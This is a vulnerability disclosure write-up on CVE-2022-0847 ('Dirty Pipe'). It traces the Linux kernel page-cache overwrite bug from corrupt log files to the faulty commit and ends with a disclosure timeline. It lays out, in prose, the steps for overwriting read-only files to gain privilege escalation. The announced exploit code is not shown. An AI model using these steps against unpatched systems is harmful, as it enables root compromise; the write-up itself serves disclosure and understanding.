The Dirty Pipe Vulnerability
The Dirty Pipe Vulnerability
Max Kellermann <email@example.com>
This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
Corruption pt. I
It all started a year ago with a support ticket about corrupt files. A customer complained that the access logs they downloaded could not be decompressed. And indeed, there was a corrupt log file on one of the log servers; it could be decompressed, but
gzip reported a CRC error. I could not explain why it was corrupt, but I assumed the nightly split process had crashed and left a corrupt file behind. I fixed the file’s CRC manually, closed the ticket, and soon forgot about the problem.
Months later, this happened again and yet again. Every time, the file’s contents looked correct, only the CRC at the end of the file was wrong. Now, with several corrupt files, I was able to dig deeper and found a surprising kind of corruption. A pattern emerged.
Let me briefly introduce how our log server works: In the CM4all hosting environment, all web servers (running our custom open source HTTP server) send UDP multicast datagrams with metadata about each HTTP request. These are received by the log servers running Pond, our custom open source in-memory database. A nightly job splits all access logs of the previous day into one per hosted web site, each compressed with zlib.
Via HTTP, all access logs of a month can be downloaded as a single
.gz file. Using a trick (which involves
Z_SYNC_FLUSH), we can just concatenate all gzipped daily log files without having to decompress and recompress them, which means this HTTP request consumes nearly no CPU. Memory bandwidth is saved by employing the
splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).
Windows users can’t handle
.gz files, but everybody can extract ZIP files. A ZIP file is just a container for
.gz files, so we could use the same method to generate ZIP files on-the-fly; all we needed to do was send a ZIP header first, then concatenate all
.gz file contents as usual, followed by the central directory (another kind of header).
Corruption pt. II
This is how a the end of a proper daily file looks:
00 00 ff ff is the sync flush which allows simple concatenation.
03 00 is an empty “final” block, and is followed by a CRC32 (
0xf50b129c) and the uncompressed file length (
0x00004af7 = 19191 bytes).
The same file but corrupted:
The sync flush is there, the empty final block is there, but the uncompressed length is now
0x0014031e = 1.3 MB (that’s wrong, it’s the same 19 kB file as above). The CRC32 is
0x02014b50, which does not match the file contents. Why? Is this an out-of-bounds write or a heap corruption bug in our log client?
I compared all known-corrupt files and discovered, to my surprise, that all of them had the same CRC32 and the same “file length” value. Always the same CRC - this implies that this cannot be the result of a CRC calculation. With corrupt data, we would see different (but wrong) CRC values. For hours, I stared holes into the code but could not find an explanation.
Then I stared at these 8 bytes. Eventually, I realized that
50 4b is ASCII for “P” and “K”. “PK”, that’s how all ZIP headers start. Let’s have a look at these 8 bytes again:
50 4bis “PK”
01 02is the code for central directory file header.
“Version made by” =
0x1e= 30 (3.0);
“Version needed to extract” =
0x0014= 20 (2.0)
The rest is missing; the header was apparently truncated after 8 bytes.
This is really the beginning of a ZIP central directory file header, this cannot be a coincidence. But the process which writes these files has no code to generate such header. In my desperation, I looked at the zlib source code and all other libraries used by that process but found nothing. This piece of software doesn’t know anything about “PK” headers.
There is one process which generates “PK” headers, though; it’s the web service which constructs ZIP files on-the-fly. But this process runs as a different user which doesn’t have write permissions on these files. It cannot possibly be that process.
None of this made sense, but new support tickets kept coming in (at a very slow rate). There was some systematic problem, but I just couldn’t get a grip on it. That gave me a lot of frustration, but I was busy with other tasks, and I kept pushing this file corruption problem to the back of my queue.
Corruption pt. III
External pressure brought this problem back into my consciousness. I scanned the whole hard disk for corrupt files (which took two days), hoping for more patterns to emerge. And indeed, there was a pattern:
there were 37 corrupt files within the past 3 months
they occurred on 22 unique days
18 of those days have 1 corruption
1 day has 2 corruptions (2021-11-21)
1 day has 7 corruptions (2021-11-30)
1 day has 6 corruptions (2021-12-31)
1 day has 4 corruptions (2022-01-31)
The last day of each month is clearly the one which most corruptions occur.
Only the primary log server had corruptions (the one which served HTTP connections and constructed ZIP files). The standby server (HTTP inactive but same log extraction process) had zero corruptions. Data on both servers was identical, minus those corruptions.
Is this caused by flaky hardware? Bad RAM? Bad storage? Cosmic rays? No, the symptoms don’t look like a hardware issue. A ghost in the machine? Do we need an exorcist?
Man staring at code
I began staring holes into my code again, this time the web service.
Remember, the web service writes a ZIP header, then uses
splice() to send all compressed files, and finally uses
write() again for the “central directory file header”, which begins with
50 4b 01 02 1e 03 14 00, exactly the corruption. The data sent over the wire looks exactly like the corrupt files on disk. But the process sending this on the wire has no write permissions on those files (and doesn’t even try to do so), it only reads them. Against all odds and against the impossible, it must be that process which causes corruptions, but how?
My first flash of inspiration why it’s always the last day of the month which gets corrupted. When a website owner downloads the access log, the server starts with the first day of the month, then the second day, and so on. Of course, the last day of the month is sent at the end; the last day of the month is always followed by the “PK” header. That’s why it’s more likely to corrupt the last day. (The other days can be corrupted if the requested month is not yet over, but that’s less likely.)
Man staring at kernel code
After being stuck for more hours, after eliminating everything that was definitely impossible (in my opinion), I drew a conclusion: this must be a kernel bug.
Blaming the Linux kernel (i.e. somebody else’s code) for data corruption must be the last resort. That is unlikely. The kernel is an extremely complex project developed by thousands of individuals with methods that may seem chaotic; despite of this, it is extremely stable and reliable. But this time, I was convinced that it must be a kernel bug.
In a moment of extraordinary clarity, I hacked two C programs.
One that keeps writing odd chunks of the string “AAAAA” to a file (simulating the log splitter):
And one that keeps transferring data from that file to a pipe using
splice() and then writes the string “BBBBB” to the pipe (simulating the ZIP generator):
I copied those two programs to the log server, and… bingo! The string “BBBBB” started appearing in the file, even though nobody ever wrote this string to the file (only to the pipe by a process without write permissions).
So this really is a kernel bug!
All bugs become shallow once they can be reproduced. A quick check verified that this bug affects Linux 5.10 (Debian Bullseye) but not Linux 4.19 (Debian Buster). There are 185.011 git commits between v4.19 and v5.10, but thanks to
git bisect, it takes just 17 steps to locate the faulty commit.
The bisect arrived at commit f6dd975583bd, which refactors the pipe buffer code for anonymous pipe buffers. It changes the way how the “mergeable” check is done for pipes.
Pipes and Buffers and Pages
Why pipes, anyway? In our setup, the web service which generates ZIP files communicates with the web server over pipes; it talks the Web Application Socket protocol which we invented because we were not happy with CGI, FastCGI and AJP. Using pipes instead of multiplexing over a socket (like FastCGI and AJP do) has a major advantage: you can use
splice() in both the application and the web server for maximum efficiency. This reduces the overhead for having web applications out-of-process (as opposed to running web services inside the web server process, like Apache modules do). This allows privilege separation without sacrificing (much) performance.
Short detour on Linux memory management: The smallest unit of memory managed by the CPU is a page (usually 4 kB). Everything in the lowest layer of Linux’s memory management is about pages. If an application requests memory from the kernel, it will get a number of (anonymous) pages. All file I/O is also about pages: if you read data from a file, the kernel first copies a number of 4 kB chunks from the hard disk into kernel memory, managed by a subsystem called the page cache. From there, the data will be copied to userspace. The copy in the page cache remains for some time, where it can be used again, avoiding unnecessary hard disk I/O, until the kernel decides it has a better use for that memory (“reclaim”). Instead of copying file data to userspace memory, pages managed by the page cache can be mapped directly into userspace using the
mmap() system call (a trade-off for reduced memory bandwidth at the cost of increased page faults and TLB flushes). The Linux kernel has more tricks: the
sendfile() system call allows an application to send file contents into a socket without a roundtrip to userspace (an optimization popular in web servers serving static files over HTTP). The
splice() system call is kind of a generalization of
sendfile(): It allows the same optimization if either side of the transfer is a pipe; the other side can be almost anything (another pipe, a file, a socket, a block device, a character device). The kernel implements this by passing page references around, not actually copying anything (zero-copy).
A pipe is a tool for unidirectional inter-process communication. One end is for pushing data into it, the other end can pull that data. The Linux kernel implements this by a ring of struct pipe_buffer, each referring to a page. The first write to a pipe allocates a page (space for 4 kB worth of data). If the most recent write does not fill the page completely, a following write may append to that existing page instead of allocating a new one. This is how “anonymous” pipe buffers work (anon_pipe_buf_ops).
If you, however,
splice() data from a file into the pipe, the kernel will first load the data into the page cache. Then it will create a
struct pipe_buffer pointing inside the page cache (zero-copy), but unlike anonymous pipe buffers, additional data written to the pipe must not be appended to such a page because the page is owned by the page cache, not by the pipe.
History of the check for whether new data can be appended to an existing pipe buffer:
struct pipe_buf_operationshad a flag called
Commit 5274f052e7b3 “Introduce sys_splice() system call” (Linux 2.6.16, 2006) featured the
splice()system call, introducing
struct pipe_buf_operationsimplementation for pipe buffers pointing into the page cache, the first one with
Commit 01e7187b4119 “pipe: stop using ->can_merge” (Linux 5.0, 2019) converted the
can_mergeflag into a
struct pipe_buf_operationspointer comparison because only
anon_pipe_buf_opshas this flag set.
Commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops” (Linux 5.8, 2020) converted this pointer comparison to per-buffer flag
Over the years, this check was refactored back and forth, which was okay. Or was it?
Several years before
PIPE_BUF_FLAG_CAN_MERGE was born, commit 241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016) added two new functions which allocate a new
struct pipe_buffer, but initialization of its
flags member was missing. It was now possible to create page cache references with arbitrary flags, but that did not matter. It was technically a bug, though without consequences at that time because all of the existing flags were rather boring.
This bug suddenly became critical in Linux 5.8 with commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops”. By injecting
PIPE_BUF_FLAG_CAN_MERGE into a page cache reference, it became possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.
Corruption pt. IV
This explains the file corruption: First, some data gets written into the pipe, then lots of files get spliced, creating page cache references. Randomly, those may or may not have
PIPE_BUF_FLAG_CAN_MERGE set. If yes, then the
write() call that writes the central directory file header will be written to the page cache of the last compressed file.
But why only the first 8 bytes of that header? Actually, all of the header gets copied to the page cache, but this operation does not increase the file size. The original file had only 8 bytes of “unspliced” space at the end, and only those bytes can be overwritten. The rest of the page is unused from the page cache’s perspective (though the pipe buffer code does use it because it has its own page fill management).
And why does this not happen more often? Because the page cache does not write back to disk unless it believes the page is “dirty”. Accidently overwriting data in the page cache will not make the page “dirty”. If no other process happens to “dirty” the file, this change will be ephemeral; after the next reboot (or after the kernel decides to drop the page from the cache, e.g. reclaim under memory pressure), the change is reverted. This allows interesting attacks without leaving a trace on hard disk.
In my first exploit (the “writer” / “splicer” programs which I used for the bisect), I had assumed that this bug is only exploitable while a privileged process writes the file, and that it depends on timing.
When I realized what the real problem was, I was able to widen the hole by a large margin: it is possible to overwrite the page cache even in the absence of writers, with no timing constraints, at (almost) arbitrary positions with arbitrary data. The limitations are:
the attacker must have read permissions (because it needs to
splice()a page into a pipe)
the offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe)
the write cannot cross a page boundary (because a new anonymous buffer would be created for the rest)
the file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended)
To exploit this vulnerability, you need to:
Create a pipe.
Fill the pipe with arbitrary data (to set the
PIPE_BUF_FLAG_CAN_MERGEflag in all ring entries).
Drain the pipe (leaving the flag set in all
struct pipe_bufferinstances on the
Splice data from the target file (opened with
O_RDONLY) into the pipe from just before the target offset.
Write arbitrary data into the pipe; this data will overwrite the cached file page instead of creating a new anomyous
To make this vulnerability more interesting, it not only works without write permissions, it also works with immutable files, on read-only btrfs snapshots and on read-only mounts (including CD-ROM mounts). That is because the page cache is always writable (by the kernel), and writing to a pipe never checks any permissions.
This is my proof-of-concept exploit:
2021-04-29: first support ticket about file corruption
2022-02-19: file corruption problem identified as Linux kernel bug, which turned out to be an exploitable vulnerability
2022-02-20: bug report, exploit and patch sent to the Linux kernel security team
2022-02-21: bug reproduced on Google Pixel 6; bug report sent to the Android Security Team
2022-02-21: patch sent to LKML (without vulnerability details) as suggested by Linus Torvalds, Willy Tarreau and Al Viro
2022-02-24: Google merges my bug fix into the Android kernel
2022-02-28: notified the linux-distros mailing list
2022-03-07: public disclosure